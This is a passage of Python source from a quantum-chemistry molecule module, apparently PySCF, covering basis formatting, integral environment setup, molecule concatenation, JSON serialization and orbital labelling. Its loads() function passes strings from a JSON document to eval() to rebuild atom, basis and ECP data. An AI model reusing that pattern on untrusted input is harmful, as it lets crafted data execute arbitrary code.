atoms.split('\\n'):\n line1 = line.strip()\n if line1 and not line1.startswith('#'):\n fmt_atoms.append(str2atm(line))\n else:\n for atom in atoms:\n if isinstance(atom, str):\n line1 = atom.strip()\n if line1 and not line1.startswith('#'):\n fmt_atoms.append(str2atm(atom.replace(',',' ')))\n else:\n if isinstance(atom[0], int):\n symb = param.ELEMENTS[atom[0]][0]\n else:\n a = atom[0].strip()\n rawsymb = _rm_digit(a)\n symb = a.replace(rawsymb, _std_symbol(rawsymb))\n if isinstance(atom[1], (int, float)):\n c = numpy.asarray(atom[1:4]) - origin\n else:\n c = numpy.asarray(atom[1]) - origin\n fmt_atoms.append([symb, numpy.dot(axes, c*convert).tolist()])\n return fmt_atoms\n\n#TODO: sort exponents\ndef format_basis(basis_tab):\n '''Convert the input :attr:`Mole.basis` to the internal data format.\n\n ``{ atom: [(l, ((-exp, c_1, c_2, ..),\n (-exp, c_1, c_2, ..))),\n (l, ((-exp, c_1, c_2, ..),\n (-exp, c_1, c_2, ..)))], ... }``\n\n Args:\n basis_tab : dict\n Similar to :attr:`Mole.basis`, it **cannot** be a str\n\n Returns:\n Formated :attr:`~Mole.basis`\n\n Examples:\n\n >>> gto.format_basis({'H':'sto-3g', 'H^2': '3-21g'})\n {'H': [[0,\n [3.4252509099999999, 0.15432897000000001],\n [0.62391373000000006, 0.53532813999999995],\n [0.16885539999999999, 0.44463454000000002]]],\n 'H^2': [[0,\n [5.4471780000000001, 0.15628500000000001],\n [0.82454700000000003, 0.90469100000000002]],\n [0, [0.18319199999999999, 1.0]]]}\n '''\n def nparray_to_list(item):\n val = []\n for x in item:\n if isinstance(x, (tuple, list)):\n val.append(nparray_to_list(x))\n elif isinstance(x, numpy.ndarray):\n val.append(x.tolist())\n else:\n val.append(x)\n return val\n\n fmt_basis = {}\n for atom in basis_tab.keys():\n symb = _symbol(atom)\n rawsymb = _rm_digit(symb)\n stdsymb = _std_symbol(rawsymb)\n symb = symb.replace(rawsymb, stdsymb)\n\n atom_basis = basis_tab[atom]\n if isinstance(atom_basis, str):\n if atom_basis.lower().startswith('unc'):\n fmt_basis[symb] = uncontract(basis.load(atom_basis[3:], stdsymb))\n else:\n fmt_basis[symb] = basis.load(atom_basis, stdsymb)\n else:\n fmt_basis[symb] = nparray_to_list(atom_basis)\n return fmt_basis\n\ndef uncontract_basis(_basis):\n '''Uncontract internal format _basis\n\n Examples:\n\n >>> gto.uncontract_basis(gto.load('sto3g', 'He'))\n [[0, [6.3624213899999997, 1]], [0, [1.1589229999999999, 1]], [0, [0.31364978999999998, 1]]]\n '''\n ubasis = []\n for b in _basis:\n angl = b[0]\n if isinstance(b[1], int):\n kappa = b[1]\n for p in b[2:]:\n ubasis.append([angl, kappa, [p[0], 1]])\n else:\n for p in b[1:]:\n ubasis.append([angl, [p[0], 1]])\n return ubasis\nuncontract = uncontract_basis\n\ndef format_ecp(ecp_tab):\n '''\n ``{ atom: (nelec, # core electrons\n ((l, # l=-1 for UL, l>=0 for Ul to indicate |l>>> gto.expand_etb(1, 3, 1.5, 2)\n [[1, [6.0, 1]], [1, [3.0, 1]], [1, [1.5, 1]]]\n '''\n return [[l, [alpha*beta**i, 1]] for i in reversed(range(n))]\ndef expand_etbs(etbs):\n r'''Generate even tempered basis. See also :func:`expand_etb`\n\n Args:\n etbs = [(l, n, alpha, beta), (l, n, alpha, beta),...]\n\n Returns:\n Formated :attr:`~Mole.basis`\n\n Examples:\n\n >>> gto.expand_etbs([(0, 2, 1.5, 2.), (1, 2, 1, 2.)])\n [[0, [6.0, 1]], [0, [3.0, 1]], [1, [1., 1]], [1, [2., 1]]]\n '''\n return pyscf.lib.flatten([expand_etb(*etb) for etb in etbs])\netbs = expand_etbs\n\n# concatenate two mol\ndef conc_env(atm1, bas1, env1, atm2, bas2, env2):\n r'''Concatenate two Mole's integral parameters. This function can be used\n to construct the environment for cross integrals like\n\n .. math::\n\n \\langle \\mu | \\nu \\rangle, \\mu \\in mol1, \\nu \\in mol2\n\n Returns:\n Concatenated atm, bas, env\n\n Examples:\n Compute the overlap between H2 molecule and O atom\n\n >>> mol1 = gto.M(atom='H 0 1 0; H 0 0 1', basis='sto3g')\n >>> mol2 = gto.M(atom='O 0 0 0', basis='sto3g')\n >>> atm3, bas3, env3 = gto.conc_env(mol1._atm, mol1._bas, mol1._env,\n ... mol2._atm, mol2._bas, mol2._env)\n >>> gto.moleintor.getints('cint1e_ovlp_sph', atm3, bas3, env3, range(2), range(2,5))\n [[ 0.04875181 0.44714688 0. 0.37820346 0. ]\n [ 0.04875181 0.44714688 0. 0. 0.37820346]]\n '''\n off = len(env1)\n natm_off = len(atm1)\n atm2 = numpy.copy(atm2)\n bas2 = numpy.copy(bas2)\n atm2[:,PTR_COORD] += off\n atm2[:,PTR_ZETA ] += off\n bas2[:,ATOM_OF ] += natm_off\n bas2[:,PTR_EXP ] += off\n bas2[:,PTR_COEFF] += off\n return (numpy.asarray(numpy.vstack((atm1,atm2)), dtype=numpy.int32),\n numpy.asarray(numpy.vstack((bas1,bas2)), dtype=numpy.int32),\n numpy.hstack((env1,env2)))\n\ndef conc_mol(mol1, mol2):\n '''Concatenate two Mole objects.\n '''\n mol3 = Mole()\n mol3._atm, mol3._bas, mol3._env = \\\n conc_env(mol1._atm, mol1._bas, mol1._env,\n mol2._atm, mol2._bas, mol2._env)\n off = len(mol1._env)\n natm_off = len(mol1._atm)\n if len(mol2._ecpbas) == 0:\n mol3._ecpbas = mol1._ecpbas\n else:\n ecpbas2 = numpy.copy(mol2._ecpbas)\n ecpbas2[:,ATOM_OF ] += natm_off\n ecpbas2[:,PTR_EXP ] += off\n ecpbas2[:,PTR_COEFF] += off\n if len(mol1._ecpbas) == 0:\n mol3._ecpbas = ecpbas2\n else:\n mol3._ecpbas = numpy.hstack((mol1._ecpbas, ecpbas2))\n\n mol3.verbose = mol1.verbose\n mol3.output = mol1.output\n mol3.max_memory = mol1.max_memory\n mol3.light_speed = mol1.light_speed\n mol3.charge = mol1.charge + mol2.charge\n mol3.spin = mol1.spin + mol2.spin\n mol3.symmetry = False\n mol3.symmetry_subgroup = None\n mol3._atom = mol1._atom + mol2._atom\n mol3.unit = mol1.unit\n mol3._basis = dict(mol2._basis)\n mol3._basis.update(mol1._basis)\n if mol2._ecp is None:\n mol3._ecp = mol1._ecp\n elif mol1._ecp is None:\n mol3._ecp = mol2._ecp\n else:\n mol3._ecp = dict(mol2._ecp)\n mol3._ecp.update(mol1._ecp)\n return mol3\n\n# \ndef intor_cross(intor, mol1, mol2, comp=1):\n r'''1-electron integrals from two molecules like\n\n .. math::\n\n \\langle \\mu | intor | \\nu \\rangle, \\mu \\in mol1, \\nu \\in mol2\n\n Args:\n intor : str\n Name of the 1-electron integral, such as cint1e_ovlp_sph (spherical overlap),\n cint1e_nuc_cart (cartesian nuclear attraction), cint1e_ipovlp\n (spinor overlap gradients), etc. Ref to :func:`getints` for the\n full list of available 1-electron integral names\n mol1, mol2:\n :class:`Mole` objects\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n Compute the overlap between H2 molecule and O atom\n\n >>> mol1 = gto.M(atom='H 0 1 0; H 0 0 1', basis='sto3g')\n >>> mol2 = gto.M(atom='O 0 0 0', basis='sto3g')\n >>> gto.intor_cross('cint1e_ovlp_sph', mol1, mol2)\n [[ 0.04875181 0.44714688 0. 0.37820346 0. ]\n [ 0.04875181 0.44714688 0. 0. 0.37820346]]\n '''\n nbas1 = len(mol1._bas)\n nbas2 = len(mol2._bas)\n atmc, basc, envc = conc_env(mol1._atm, mol1._bas, mol1._env,\n mol2._atm, mol2._bas, mol2._env)\n shls_slice = (0, nbas1, nbas1, nbas1+nbas2)\n return moleintor.getints(intor, atmc, basc, envc, shls_slice, comp, 0)\n\n# append (charge, pointer to coordinates, nuc_mod) to _atm\ndef make_atm_env(atom, ptr=0):\n '''Convert the internal format :attr:`Mole._atom` to the format required\n by ``libcint`` integrals\n '''\n nuc_charge = _charge(atom[0])\n _env = numpy.hstack((atom[1], dyall_nuc_mod(param.ELEMENTS[nuc_charge][1])))\n _atm = numpy.zeros(6, dtype=numpy.int32)\n _atm[CHARGE_OF] = nuc_charge\n _atm[PTR_COORD] = ptr\n _atm[NUC_MOD_OF] = NUC_POINT\n _atm[PTR_ZETA ] = ptr + 3\n return _atm, _env\n\n# append (atom, l, nprim, nctr, kappa, ptr_exp, ptr_coeff, 0) to bas\n# absorb normalization into GTO contraction coefficients\ndef make_bas_env(basis_add, atom_id=0, ptr=0):\n '''Convert :attr:`Mole.basis` to the argument ``bas`` for ``libcint`` integrals\n '''\n _bas = []\n _env = []\n for b in basis_add:\n if not b: # == []\n continue\n angl = b[0]\n #if angl in [6, 7]:\n # print('libcint may have large error for ERI of i function')\n if isinstance(b[1], int):\n kappa = b[1]\n b_coeff = numpy.array(b[2:])\n else:\n kappa = 0\n b_coeff = numpy.array(b[1:])\n es = b_coeff[:,0]\n cs = b_coeff[:,1:]\n nprim, nctr = cs.shape\n cs = numpy.einsum('pi,p->pi', cs, gto_norm(angl, es))\n# normalize contracted AO\n #ee = numpy.empty((nprim,nprim))\n #for i in range(nprim):\n # for j in range(i+1):\n # ee[i,j] = ee[j,i] = _gaussian_int(angl*2+2, es[i]+es[j])\n #s1 = 1/numpy.sqrt(numpy.einsum('pi,pq,qi->i', cs, ee, cs))\n ee = es.reshape(-1,1) + es.reshape(1,-1)\n ee = _gaussian_int(angl*2+2, ee)\n s1 = 1/numpy.sqrt(numpy.einsum('pi,pq,qi->i', cs, ee, cs))\n cs = numpy.einsum('pi,i->pi', cs, s1)\n\n _env.append(es)\n _env.append(cs.T.reshape(-1))\n ptr_exp = ptr\n ptr_coeff = ptr_exp + nprim\n ptr = ptr_coeff + nprim * nctr\n _bas.append([atom_id, angl, nprim, nctr, kappa, ptr_exp, ptr_coeff, 0])\n _env = pyscf.lib.flatten(_env) # flatten nested lists\n return (numpy.array(_bas, numpy.int32).reshape(-1,BAS_SLOTS),\n numpy.array(_env, numpy.double))\n\ndef make_env(atoms, basis, pre_env=[], nucmod={}):\n '''Generate the input arguments for ``libcint`` library based on internal\n format :attr:`Mole._atom` and :attr:`Mole._basis`\n '''\n _atm = []\n _bas = []\n _env = []\n ptr_env = len(pre_env)\n\n for ia, atom in enumerate(atoms):\n symb = atom[0]\n atm0, env0 = make_atm_env(atom, ptr_env)\n ptr_env = ptr_env + len(env0)\n if nucmod:\n if isinstance(nucmod, int):\n assert(nucmod in (NUC_POINT, NUC_GAUSS))\n atm0[NUC_MOD_OF] = nucmod\n elif isinstance(nucmod, str):\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod)\n elif ia+1 in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[ia+1])\n elif symb in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[symb])\n elif _rm_digit(symb) in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[_rm_digit(symb)])\n _atm.append(atm0)\n _env.append(env0)\n\n _basdic = {}\n for symb, basis_add in basis.items():\n bas0, env0 = make_bas_env(basis_add, 0, ptr_env)\n if bas0.size == 0:\n sys.stderr.write('No basis found for atom %s\\n' % symb)\n ptr_env = ptr_env + len(env0)\n _basdic[symb] = bas0\n _env.append(env0)\n\n for ia, atom in enumerate(atoms):\n symb = atom[0]\n puresymb = _rm_digit(symb)\n if symb in _basdic:\n b = _basdic[symb].copy()\n b[:,ATOM_OF] = ia\n _bas.append(b)\n elif puresymb in _basdic:\n b = _basdic[puresymb].copy()\n b[:,ATOM_OF] = ia\n _bas.append(b)\n else:\n sys.stderr.write('Warn: Basis not found for atom %d %s\\n' % (ia, symb))\n\n if _atm:\n _atm = numpy.asarray(numpy.vstack(_atm), numpy.int32).reshape(-1, ATM_SLOTS)\n else:\n _atm = numpy.zeros((0,ATM_SLOTS), numpy.int32)\n if _bas:\n _bas = numpy.asarray(numpy.vstack(_bas), numpy.int32).reshape(-1, BAS_SLOTS)\n else:\n _bas = numpy.zeros((0,BAS_SLOTS), numpy.int32)\n if _env:\n _env = numpy.hstack((pre_env,numpy.hstack(_env)))\n else:\n _env = numpy.array(pre_env, copy=False)\n return _atm, _bas, _env\n\ndef make_ecp_env(mol, _atm, ecp, pre_env=[]):\n _env = []\n ptr_env = len(pre_env)\n\n _ecpdic = {}\n for symb, ecp_add in ecp.items():\n ecp0 = []\n nelec = ecp_add[0]\n for lb in ecp_add[1]:\n for rorder, bi in enumerate(lb[1]):\n if len(bi) > 0:\n ec = numpy.array(bi)\n _env.append(ec[:,0])\n ptr_exp = ptr_env\n _env.append(ec[:,1])\n ptr_coeff = ptr_exp + ec.shape[0]\n ptr_env = ptr_coeff + ec.shape[0]\n ecp0.append([0, lb[0], ec.shape[0], rorder, 0,\n ptr_exp, ptr_coeff, 0])\n _ecpdic[symb] = (nelec, numpy.asarray(ecp0, dtype=numpy.int32))\n\n _ecpbas = []\n if _ecpdic:\n _atm = _atm.copy()\n for ia, atom in enumerate(mol._atom):\n symb = atom[0]\n if symb in _ecpdic:\n ecp0 = _ecpdic[symb]\n elif _rm_digit(symb) in _ecpdic:\n ecp0 = _ecpdic[_rm_digit(symb)]\n else:\n ecp0 = None\n if ecp0 is not None:\n _atm[ia,CHARGE_OF ] = _charge(symb) - ecp0[0]\n b = ecp0[1].copy()\n b[:,ATOM_OF] = ia\n _ecpbas.append(b)\n if _ecpbas:\n _ecpbas = numpy.asarray(numpy.vstack(_ecpbas), numpy.int32)\n _env = numpy.hstack((pre_env, numpy.hstack(_env)))\n else:\n _ecpbas = numpy.zeros((0,BAS_SLOTS), numpy.int32)\n _env = pre_env\n return _atm, _ecpbas, _env\n\ndef tot_electrons(mol):\n '''Total number of electrons for the given molecule\n\n Returns:\n electron number in integer\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 1 0; C 0 0 1', charge=1)\n >>> mol.tot_electrons()\n 6\n '''\n nelectron = mol.atom_charges().sum() - mol.charge\n return int(nelectron)\n\ndef copy(mol):\n '''Deepcopy of the given :class:`Mole` object\n '''\n import copy\n newmol = copy.copy(mol)\n newmol._atm = numpy.copy(mol._atm)\n newmol._bas = numpy.copy(mol._bas)\n newmol._env = numpy.copy(mol._env)\n newmol._ecpbas = numpy.copy(mol._ecpbas)\n\n newmol.atom = copy.deepcopy(mol.atom)\n newmol._atom = copy.deepcopy(mol._atom)\n newmol.basis = copy.deepcopy(mol.basis)\n newmol._basis = copy.deepcopy(mol._basis)\n newmol.ecp = copy.deepcopy(mol.ecp)\n newmol._ecp = copy.deepcopy(mol._ecp)\n return newmol\n\ndef pack(mol):\n '''Pack the input args of :class:`Mole` to a dict, which can be serialized\n with :mod:`pickle` or :mod:`json`.\n\n Note this function only pack the input arguments than the entire Mole\n class. Modifications to mol._atm, mol._bas, mol._env are not tracked.\n Use :func:`dumps` to serialize the entire Mole object.\n '''\n return {'atom' : mol.atom,\n 'unit' : mol.unit,\n 'basis' : mol.basis,\n 'charge' : mol.charge,\n 'spin' : mol.spin,\n 'symmetry': mol.symmetry,\n 'nucmod' : mol.nucmod,\n 'ecp' : mol.ecp,\n 'light_speed': mol.light_speed}\ndef unpack(moldic):\n '''Unpack a dict which is packed by :func:`pack`, to generate the input\n arguments for :class:`Mole` object.\n '''\n mol = Mole()\n mol.__dict__.update(moldic)\n return mol\n\n\ndef dumps(mol):\n '''Serialize Mole object to a JSON formatted str.\n '''\n exclude_keys = set(('output', 'stdout', '_keys'))\n nparray_keys = set(('_atm', '_bas', '_env', '_ecpbas'))\n\n moldic = dict(mol.__dict__)\n for k in exclude_keys:\n del(moldic[k])\n for k in nparray_keys:\n if isinstance(moldic[k], numpy.ndarray):\n moldic[k] = moldic[k].tolist()\n moldic['atom'] = repr(mol.atom)\n moldic['basis']= repr(mol.basis)\n moldic['ecp' ] = repr(mol.ecp)\n\n if mol.symm_orb is not None:\n # compress symm_orb\n symm_orb = []\n for c in mol.symm_orb:\n x,y = numpy.nonzero(c)\n val = c[x,y]\n symm_orb.append((val.tolist(), x.tolist(), y.tolist(), c.shape))\n moldic['symm_orb'] = symm_orb\n try:\n return json.dumps(moldic)\n except TypeError:\n import warnings\n def skip_value(dic):\n dic1 = {}\n for k,v in dic.items():\n if (v is None or\n isinstance(v, (str, bool, int, float))):\n dic1[k] = v\n elif isinstance(v, (list, tuple)):\n dic1[k] = v # Should I recursively skip_vaule?\n elif isinstance(v, set):\n dic1[k] = list(v)\n elif isinstance(v, dict):\n dic1[k] = skip_value(v)\n else:\n msg =('Function mol.dumps drops attribute %s because '\n 'it is not JSON-serializable' % k)\n warnings.warn(msg)\n return dic1\n return json.dumps(skip_value(moldic), skipkeys=True)\n\ndef loads(molstr):\n '''Deserialize a str containing a JSON document to a Mole object.\n '''\n from numpy import array # for eval function\n moldic = json.loads(molstr)\n if sys.version_info < (3,):\n# Convert to utf8 because JSON loads fucntion returns unicode.\n def byteify(inp):\n if isinstance(inp, dict):\n return dict([(byteify(k), byteify(v)) for k, v in inp.iteritems()])\n elif isinstance(inp, (tuple, list)):\n return [byteify(x) for x in inp]\n elif isinstance(inp, unicode):\n return inp.encode('utf-8')\n else:\n return inp\n moldic = byteify(moldic)\n mol = Mole()\n mol.__dict__.update(moldic)\n mol.atom = eval(mol.atom)\n mol.basis= eval(mol.basis)\n mol.ecp = eval(mol.ecp)\n mol._atm = numpy.array(mol._atm, dtype=numpy.int32)\n mol._bas = numpy.array(mol._bas, dtype=numpy.int32)\n mol._env = numpy.array(mol._env, dtype=numpy.double)\n mol._ecpbas = numpy.array(mol._ecpbas, dtype=numpy.int32)\n\n if mol.symm_orb is not None:\n # decompress symm_orb\n symm_orb = []\n for val, x, y, shape in mol.symm_orb:\n c = numpy.zeros(shape)\n c[numpy.array(x),numpy.array(y)] = numpy.array(val)\n symm_orb.append(c)\n mol.symm_orb = symm_orb\n return mol\n\n\ndef len_spinor(l, kappa):\n '''The number of spinor associated with given angular momentum and kappa. If kappa is 0,\n return 4l+2\n '''\n if kappa == 0:\n n = (l * 4 + 2)\n elif kappa < 0:\n n = (l * 2 + 2)\n else:\n n = (l * 2)\n return n\n\ndef len_cart(l):\n '''The number of Cartesian function associated with given angular momentum.\n '''\n return (l + 1) * (l + 2) // 2\n\ndef npgto_nr(mol, cart=False):\n '''Total number of primitive spherical GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n if cart:\n return ((l+1)*(l+2)//2 * mol._bas[:,NPRIM_OF]).sum()\n else:\n return ((l*2+1) * mol._bas[:,NPRIM_OF]).sum()\ndef nao_nr(mol, cart=False):\n '''Total number of contracted spherical GTOs for the given :class:`Mole` object'''\n if cart:\n return nao_cart(mol)\n else:\n return ((mol._bas[:,ANG_OF]*2+1) * mol._bas[:,NCTR_OF]).sum()\ndef nao_cart(mol):\n '''Total number of contracted cartesian GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n return ((l+1)*(l+2)//2 * mol._bas[:,NCTR_OF]).sum()\n\n# nao_id0:nao_id1 corresponding to bas_id0:bas_id1\ndef nao_nr_range(mol, bas_id0, bas_id1):\n '''Lower and upper boundary of contracted spherical basis functions associated\n with the given shell range\n\n Args:\n mol :\n :class:`Mole` object\n bas_id0 : int\n start shell id\n bas_id1 : int\n stop shell id\n\n Returns:\n tupel of start basis function id and the stop function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.nao_nr_range(mol, 2, 4)\n (2, 6)\n '''\n ao_loc = moleintor.make_loc(mol._bas[:bas_id1], 'sph')\n nao_id0 = ao_loc[bas_id0]\n nao_id1 = ao_loc[-1]\n return nao_id0, nao_id1\n\ndef nao_2c(mol):\n '''Total number of contracted spinor GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n kappa = mol._bas[:,KAPPA_OF]\n dims = (l*4+2) * mol._bas[:,NCTR_OF]\n dims[kappa<0] = l[kappa<0] * 2 + 2\n dims[kappa>0] = l[kappa>0] * 2\n return dims.sum()\n\n# nao_id0:nao_id1 corresponding to bas_id0:bas_id1\ndef nao_2c_range(mol, bas_id0, bas_id1):\n '''Lower and upper boundary of contracted spinor basis functions associated\n with the given shell range\n\n Args:\n mol :\n :class:`Mole` object\n bas_id0 : int\n start shell id, 0-based\n bas_id1 : int\n stop shell id, 0-based\n\n Returns:\n tupel of start basis function id and the stop function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.nao_2c_range(mol, 2, 4)\n (4, 12)\n '''\n ao_loc = moleintor.make_loc(mol._bas[:bas_id1], '')\n nao_id0 = ao_loc[bas_id0]\n nao_id1 = ao_loc[-1]\n return nao_id0, nao_id1\n\ndef ao_loc_nr(mol, cart=False):\n '''Offset of every shell in the spherical basis function spectrum\n\n Returns:\n list, each entry is the corresponding start basis function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.ao_loc_nr(mol)\n [0, 1, 2, 3, 6, 9, 10, 11, 12, 15, 18]\n '''\n if cart:\n return moleintor.make_loc(mol._bas, 'cart')\n else:\n return moleintor.make_loc(mol._bas, 'sph')\n\ndef ao_loc_2c(mol):\n '''Offset of every shell in the spinor basis function spectrum\n\n Returns:\n list, each entry is the corresponding start id of spinor function\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.ao_loc_2c(mol)\n [0, 2, 4, 6, 12, 18, 20, 22, 24, 30, 36]\n '''\n return moleintor.make_loc(mol._bas, 'spinor')\n\ndef time_reversal_map(mol):\n r'''The index to map the spinor functions and its time reversal counterpart.\n The returned indices have postive or negative values. For the i-th basis function,\n if the returned j = idx[i] < 0, it means :math:`T|i\\rangle = -|j\\rangle`,\n otherwise :math:`T|i\\rangle = |j\\rangle`\n '''\n tao = []\n i = 0\n for b in mol._bas:\n l = b[ANG_OF];\n if b[KAPPA_OF] == 0:\n djs = (l * 2, l * 2 + 2)\n elif b[KAPPA_OF] > 0:\n djs = (l * 2,)\n else:\n djs = (l * 2 + 2,)\n if l % 2 == 0:\n for n in range(b[NCTR_OF]):\n for dj in djs:\n for m in range(0, dj, 2):\n tao.append(-(i + dj - m))\n tao.append( i + dj - m - 1)\n i += dj\n else:\n for n in range(b[NCTR_OF]):\n for dj in djs:\n for m in range(0, dj, 2):\n tao.append( i + dj - m)\n tao.append(-(i + dj - m - 1))\n i += dj\n return tao\n\ndef energy_nuc(mol):\n '''Nuclear repulsion energy, (AU)\n\n Returns\n float\n '''\n if mol.natm == 0:\n return 0\n #e = 0\n #chargs = [mol.atom_charge(i) for i in range(len(mol._atm))]\n #coords = [mol.atom_coord(i) for i in range(len(mol._atm))]\n #for j in range(len(mol._atm)):\n # q2 = chargs[j]\n # r2 = coords[j]\n # for i in range(j):\n # q1 = chargs[i]\n # r1 = coords[i]\n # r = numpy.linalg.norm(r1-r2)\n # e += q1 * q2 / r\n chargs = mol.atom_charges()\n coords = mol.atom_coords()\n rr = numpy.dot(coords, coords.T)\n rd = rr.diagonal()\n rr = rd[:,None] + rd - rr*2\n rr[numpy.diag_indices_from(rr)] = 1e-60\n r = numpy.sqrt(rr)\n qq = chargs[:,None] * chargs[None,:]\n qq[numpy.diag_indices_from(qq)] = 0\n e = (qq/r).sum() * .5\n return e\n\ndef spheric_labels(mol, fmt=True):\n '''Labels for spheric GTO functions\n\n Kwargs:\n fmt : str or bool\n if fmt is boolean, it controls whether to format the labels and the\n default format is \"%d%3s %s%-4s\". if fmt is string, the string will\n be used as the print format.\n\n Returns:\n List of [(atom-id, symbol-str, nl-str, str-of-real-spheric-notation]\n or formatted strings based on the argument \"fmt\"\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> gto.spheric_labels(mol)\n [(0, 'H', '1s', ''), (1, 'Cl', '1s', ''), (1, 'Cl', '2s', ''), (1, 'Cl', '3s', ''), (1, 'Cl', '2p', 'x'), (1, 'Cl', '2p', 'y'), (1, 'Cl', '2p', 'z'), (1, 'Cl', '3p', 'x'), (1, 'Cl', '3p', 'y'), (1, 'Cl', '3p', 'z')]\n '''\n count = numpy.zeros((mol.natm, 9), dtype=int)\n label = []\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l = mol.bas_angular(ib)\n strl = param.ANGULAR[l]\n nc = mol.bas_nctr(ib)\n symb = mol.atom_symbol(ia)\n nelec_ecp = mol.atom_nelec_core(ia)\n if nelec_ecp == 0 or l > 3:\n shl_start = count[ia,l]+l+1\n else:\n coreshl = pyscf.gto.ecp.core_configuration(nelec_ecp)\n shl_start = coreshl[l]+count[ia,l]+l+1\n for n in range(shl_start, shl_start+nc):\n for m in range(-l, l+1):\n label.append((ia, symb, '%d%s' % (n, strl), \\\n '%s' % param.REAL_SPHERIC[l][l+m]))\n count[ia,l] += nc\n if isinstance(fmt, str):\n return [(fmt % x) for x in label]\n elif fmt:\n return ['%d %s %s%-4s' % x for x in label]\n else:\n return label\n\ndef cart_labels(mol, fmt=True):\n '''Labels for Cartesian GTO functions\n\n Kwargs:\n fmt : str or bool\n if fmt is boolean, it controls whether to format the labels and the\n default format is \"%d%3s %s%-4s\". if fmt is string, the string will\n be used as the print format.\n\n Returns:\n List of [(atom-id, symbol-str, nl-str, str-of-real-spheric-notation]\n or formatted strings based on the argument \"fmt\"\n '''\n count = numpy.zeros((mol.natm, 9), dtype=int)\n label = []\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l = mol.bas_angular(ib)\n strl = param.ANGULAR[l]\n nc = mol.bas_nctr(ib)\n symb = mol.atom_symbol(ia)\n nelec_ecp = mol.atom_nelec_core(ia)\n if nelec_ecp == 0 or l > 3:\n shl_start = count[ia,l]+l+1\n else:\n coreshl = pyscf.gto.ecp.core_configuration(nelec_ecp)\n shl_start = coreshl[l]+count[ia,l]+l+1\n for n in range(shl_start, shl_start+nc):\n for lx in reversed(range(l+1)):\n for ly in reversed(range(l+1-lx)):\n lz = l - lx - ly\n label.append((ia, symb, '%d%s' % (n, strl),\n ''.join(('x'*lx, 'y'*ly, 'z'*lz))))\n count[ia,l] += nc\n if isinstance(fmt, str):\n return [(fmt % x) for x in label]\n elif fmt:\n return ['%d%3s %s%-4s' % x for x in label]\n else:\n return label\n\n\ndef spinor_labels(mol):\n raise RuntimeError('TODO')\n\ndef search_shell_id(mol, atm_id, l):\n '''Search the first basis/shell id (**not** the basis function id) which\n matches the given atom-id and angular momentum\n\n Args:\n atm_id : int\n atom id, 0-based\n l : int\n angular momentum\n\n Returns:\n basis id, 0-based. If not found, return None\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> mol.search_shell_id(1, 1) # Cl p shell\n 4\n >>> mol.search_shell_id(1, 2) # Cl d shell\n None\n '''\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l1 = mol.bas_angular(ib)\n if ia == atm_id and l1 == l:\n return ib\n\ndef search_ao_nr(mol, atm_id, l, m, atmshell):\n '''Search the first basis function id (**not** the shell id) which matches\n the given atom-id, angular momentum magnetic angular momentum, principal shell.\n\n Args:\n atm_id : int\n atom id, 0-based\n l : int\n angular momentum\n m : int\n magnetic angular momentum\n atmshell : int\n principal quantum number\n\n Returns:\n basis function id, 0-based. If not found, return None\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> mol.search_ao_nr(1, 1, -1, 3) # Cl 3px\n 7\n '''\n ibf = 0\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l1 = mol.bas_angular(ib)\n nc = mol.bas_nctr(ib)\n if ia == atm_id and l1 == l:\n if atmshell > nc+l1:\n atmshell = atmshell - nc\n else:\n return ibf + (atmshell-l1-1)*(l1*2+1) + (l1+m)\n ibf += (l1*2+1) * nc\n\ndef search_ao_r(mol, atm_id, l, j, m, atmshell):\n raise RuntimeError('TODO')\n#TODO: ibf = 0\n#TODO: for ib in range(len(mol._bas)):\n#TODO: ia = mol.bas_atom(ib)\n#TODO: l1 = mol.bas_angular(ib)\n#TODO: nc = mol.bas_nctr(ib)\n#TODO: k = mol.bas_kappa(bas_id)\n#TODO: degen = len_spinor(l1, k)\n#TODO: if ia == atm_id and l1 == l and k == kappa:\n#TODO: if atmshell > nc+l1:\n#TODO: atmshell = atmshell - nc\n#TODO: else:\n#TODO: return ibf + (atmshell-l1-1)*degen + (degen+m)\n#TODO: ibf += degen\n\ndef offset_nr_by_atom(mol):\n '''Non-relativistic AO offset for each atom. Return a list, each item\n of the list gives (start-shell-id, stop-shell-id, start-AO-id, stop-AO-id)\n '''\n aorange = []\n p0 = p1 = 0\n b0 = b1 = 0\n ia0 = 0\n for ib in range(mol.nbas):\n if ia0 != mol.bas_atom(ib):\n aorange.append((b0, ib, p0, p1))\n ia0 = mol.bas_atom(ib)\n p0 = p1\n b0 = ib\n p1 += (mol.bas_angular(ib)*2+1) * mol.bas_nctr(ib)\n aorange.append((b0, mol.nbas, p0, p1))\n return aorange\n\ndef offset_2c_by_atom(mol):\n '''2-component AO offset for each atom. Return a list, each item\n of the list gives (start-shell-id, stop-shell-id, start-AO-id, stop-AO-id)\n '''\n aorange = []\n p0 = p1 = 0\n b0 = b1 = 0\n ia0 = 0\n for ib in range(mol.nbas):\n if ia0 != mol.bas_atom(ib):\n aorange.append((b0, ib, p0, p1))\n ia0 = 